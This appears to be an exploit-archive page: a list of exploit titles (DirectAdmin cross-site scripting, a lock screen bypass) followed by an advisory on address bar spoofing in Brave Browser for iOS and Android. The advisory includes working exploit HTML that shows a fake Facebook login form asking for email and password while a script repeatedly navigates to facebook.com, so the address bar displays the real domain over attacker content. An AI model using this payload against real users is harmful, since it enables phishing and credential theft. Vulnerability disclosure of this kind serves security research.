a1c336773a
3 new exploits Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing Advanced Desktop Locker 6.0.0 - Lock Screen Bypass DirectAdmin 1.28/1.29 - CMD_SHOW_RESELLER user Parameter Cross-Site Scripting DirectAdmin 1.28/1.29 - CMD_SHOW_USER user Parameter Cross-Site Scripting DirectAdmin 1.28/1.29 - CMD_TICKET_CREATE TYPE Parameter Cross-Site Scripting DirectAdmin 1.28/1.29 - CMD_EMAIL_FORWARDER_MODIFY user Parameter Cross-Site Scripting DirectAdmin 1.28/1.29 - CMD_TICKET type Parameter Cross-Site Scripting DirectAdmin 1.28/1.29 - CMD_EMAIL_VACATION_MODIFY user Parameter Cross-Site Scripting DirectAdmin 1.28/1.29 - CMD_EMAIL_LIST name Parameter Cross-Site Scripting DirectAdmin 1.28/1.29 - CMD_FTP_SHOW DOMAIN Parameter Cross-Site Scripting DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting DirectAdmin 1.292 - CMD_USER_STATS Cross-Site Scripting DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting DirectAdmin 1.50.1 - Denial of Service
31 lines
1 KiB
HTML
Executable file
31 lines
1 KiB
HTML
Executable file
Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar
|
|
spoofing is a critical vulnerability in which any attacker can spoof the
|
|
address bar to a legit looking website but the content of the web-page
|
|
remains different from the Address-Bar display of the site. In Simple
|
|
words, the victim sees a familiar looking URL but the content is not from
|
|
the same URL but the attacker controlled content. Some companies say "We
|
|
recognize that the address bar is the only reliable security indicator in
|
|
modern browsers" .
|
|
Products affected:
|
|
|
|
- In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
|
|
- In Android - Affected in Brave Latest version 1.9.56
|
|
|
|
|
|
Exploit Code:
|
|
|
|
<html>
|
|
<title>Address Bar spoofing Brave</title>
|
|
<h1> This is Dummy Facebook </h1>
|
|
<form>
|
|
Email: <input type="text" name="username" placeholder="add email"><br>
|
|
Password: <input type="text" name="password" placeholder="pass">
|
|
<script>
|
|
function f()
|
|
{
|
|
location = "https://facebook.com"
|
|
}
|
|
setInterval("f()", 10);
|
|
</script>
|
|
</html>
|
|
|